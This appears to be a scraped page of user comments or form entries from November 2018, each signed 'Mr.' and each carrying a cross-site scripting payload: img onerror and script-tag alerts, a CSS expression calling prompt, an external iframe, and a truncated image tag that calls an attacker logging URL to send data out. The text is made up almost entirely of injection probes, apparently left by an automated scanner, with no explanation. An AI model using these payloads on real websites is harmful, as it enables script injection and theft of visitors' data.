1

20/11/2018 03:07 ب.ظ
Mr.<img<!-- --> src=x onerror=alert(971593);//><!-- -->

1

20/11/2018 03:07 ب.ظ
Mr.}body{acu:Expre/**/SSion(prompt(902731))}

1

20/11/2018 03:07 ب.ظ
Mr._4Hpjo <ScRiPt >prompt(931950)</ScRiPt>

1

20/11/2018 03:07 ب.ظ
Mr.<ifRAme sRc=966155.com></IfRamE>

1

20/11/2018 03:07 ب.ظ
Mr.<img sRc='http://attacker-948255/log.php?

1